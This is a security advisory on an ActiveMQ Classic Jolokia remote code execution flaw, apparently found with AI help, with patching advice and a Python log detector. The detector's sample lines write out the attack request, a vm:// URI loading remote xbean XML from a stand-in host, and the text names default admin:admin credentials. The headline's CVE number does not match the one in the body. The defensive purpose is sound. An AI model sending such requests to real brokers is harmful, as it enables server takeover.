Critical RCE Flaw CVE-2023-46604 in Apache ActiveMQ Exposes Servers
Key Takeaways
- A critical remote code execution (RCE) vulnerability, CVE-2026-34197, has been discovered in Apache ActiveMQ Classic.
- The flaw impacts versions 5.x, 6.0.0 through 6.1.1, and allows arbitrary code execution, potentially without authentication in some cases.
- This vulnerability was notably identified by Anthropic’s Claude AI model in under 10 minutes, highlighting AI’s growing role in cybersecurity research.
- A patch is available in ActiveMQ Classic versions 5.19.4 and 6.2.3, and immediate updates are strongly recommended.
A significant remote code execution (RCE) vulnerability, present in Apache ActiveMQ Classic for over a decade, has finally come to light. This discovery is particularly notable as it was identified not by human researchers, but by Anthropic’s Claude AI model, which pinpointed the flaw in a mere ten minutes.
Designated as CVE-2026-34197, this vulnerability stems from improper input validation and code injection within the Jolokia JMX-HTTP bridge of Apache ActiveMQ Classic. The affected component is exposed via the web console at /api/jolokia/ on port 8161.
Technical Breakdown of the Flaw
The vulnerability enables an authenticated attacker to execute the addNetworkConnector(String) management operation on the broker’s MBean. By supplying a specially crafted VM transport URI containing an attacker-controlled brokerConfig=xbean:http:// parameter, a malicious actor can trigger the exploit.
Upon processing this input, ActiveMQ’s VM transport layer initiates an embedded broker on the fly. This occurs through a call to BrokerFactory.createBroker(), utilizing the URL provided by the attacker.
Subsequently, the xbean: scheme passes this URL to Spring’s ResourceXmlApplicationContext. This component then instantiates all bean definitions found in the remote XML file. This critical step allows for arbitrary operating system command execution by leveraging Spring’s MethodInvokingFactoryBean to invoke Runtime.getRuntime().exec().
The root cause of this vulnerability can be traced back to a remediation effort for CVE-2022-41678. In that fix, Apache introduced a broad Jolokia allow rule for all operations on ActiveMQ’s own MBeans (org.apache.activemq:*) to maintain web console functionality. This decision inadvertently exposed every management operation, including addNetworkConnector, as an attack vector through Jolokia’s REST API.
Authentication and Unauthenticated Attack Paths
While CVE-2026-34197 requires valid authentication credentials for exploitation in most deployments, the widespread use of default credentials (admin:admin) across enterprise environments significantly lowers the barrier for attackers.
More critically, organizations operating ActiveMQ versions 6.0.0 through 6.1.1 face a fully unauthenticated RCE path. A separate vulnerability, CVE-2024-32114, inadvertently removed authentication constraints from the /api/* path in these specific versions. This means the Jolokia endpoint in these builds requires no credentials, effectively transforming CVE-2026-34197 into a no-authentication RCE for those deployments.
ActiveMQ has a documented history of being targeted in the wild. Both CVE-2016-3088 (an authenticated RCE via the web console) and CVE-2023-46604 (an unauthenticated RCE via the broker port) are listed on CISA’s Known Exploited Vulnerabilities (KEV) catalog, underscoring the product’s appeal to threat actors.
AI’s Role in Discovery
Researchers at Horizon3.ai credited Anthropic’s Claude AI for identifying this flaw during an AI-assisted source code review. By providing Claude with a focused vulnerability-hunting prompt and a live target for validation, the AI successfully traced the complex, multi-component attack chain involving Jolokia, JMX, network connectors, and VM transports in approximately 10 minutes.
Analysts highlighted that mapping such a complex chain would likely have taken a skilled human researcher an entire week to accomplish manually. This achievement underscores how AI models are significantly lowering the entry barrier for advanced vulnerability research.
What You Should Do
- Update Immediately: Patch to ActiveMQ Classic versions 5.19.4 or 6.2.3 without delay. These versions entirely remove the ability of addNetworkConnector to register vm:// transports via the Jolokia API.
- Monitor Logs: Scrutinize ActiveMQ broker logs for entries containing vm:// URIs with brokerConfig=xbean:http, POST requests to /api/jolokia/ that include addNetworkConnector in the body, and any unexpected outbound HTTP connections originating from the ActiveMQ process.
- Detect Abnormal Processes: Watch for unusual child processes spawned by the ActiveMQ JVM, which could indicate successful exploitation.
- Audit Credentials: Conduct an immediate audit of all ActiveMQ instances to identify and eliminate the use of default credentials (e.g., admin:admin). Implement strong, unique passwords for all accounts.
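The log indicators listed above, turned into a small detector as an added example (not code from the advisory or the ActiveMQ project). It assumes a reverse-proxy request log that records POST bodies for /api/jolokia/ alongside ordinary broker log lines; both formats and all sample lines below are constructed for illustration, and the detector also percent-decodes input so URL-encoded bodies are not missed.

```python
import re
from urllib.parse import unquote

# Indicators from the advisory: addNetworkConnector invoked through Jolokia,
# and a vm:// transport URI carrying brokerConfig=xbean:http(s)://
JOLOKIA_PATH = re.compile(r"POST\s+/api/jolokia/?", re.IGNORECASE)
ADD_CONNECTOR = re.compile(r"addNetworkConnector", re.IGNORECASE)
XBEAN_VM_URI = re.compile(r"vm://[^\s\"']*brokerConfig=xbean:https?://", re.IGNORECASE)


def normalize(line: str) -> str:
    """Percent-decode twice so single- and double-encoded bodies are caught."""
    return unquote(unquote(line))


def classify(line: str) -> list[str]:
    """Return the indicator names matched by one log line (empty if clean)."""
    text = normalize(line)
    hits = []
    if JOLOKIA_PATH.search(text) and ADD_CONNECTOR.search(text):
        hits.append("jolokia_addNetworkConnector")
    if XBEAN_VM_URI.search(text):
        hits.append("vm_xbean_remote_config")
    return hits


def scan(lines):
    """Return (line_number, indicators) for every suspicious line."""
    return [(n, h) for n, raw in enumerate(lines, 1) if (h := classify(raw))]


# Constructed sample lines (hypothetical proxy log with bodies + broker log)
SAMPLE_LOG = [
    '10.0.0.5 - admin "POST /api/jolokia/ HTTP/1.1" 200 body={"type":"exec","operation":"addNetworkConnector(java.lang.String)","arguments":["vm://x?brokerConfig=xbean:http://198.51.100.7/b.xml"]}',
    '10.0.0.5 - admin "POST /api/jolokia/ HTTP/1.1" 200 body={"type":"read","attribute":"TotalEnqueueCount"}',
    '10.0.0.9 - - "GET /api/jolokia/version HTTP/1.1" 200 -',
    '10.0.0.5 - admin "POST /api/jolokia/ HTTP/1.1" 200 body=%7B%22operation%22%3A%22addNetworkConnector%22%2C%22arguments%22%3A%5B%22vm%3A%2F%2Fx%3FbrokerConfig%3Dxbean%3Ahttp%3A%2F%2F198.51.100.7%2Fb.xml%22%5D%7D',
    "INFO | Connector vm://localhost started",
    "INFO | Establishing network connection from vm://x?brokerConfig=xbean:http://198.51.100.7/b.xml",
]

if __name__ == "__main__":
    for n, hits in scan(SAMPLE_LOG):
        print(f"line {n}: {', '.join(hits)}")
```

A hit on jolokia_addNetworkConnector from a known operator account still deserves a second look, since the advisory notes most exploitation is authenticated.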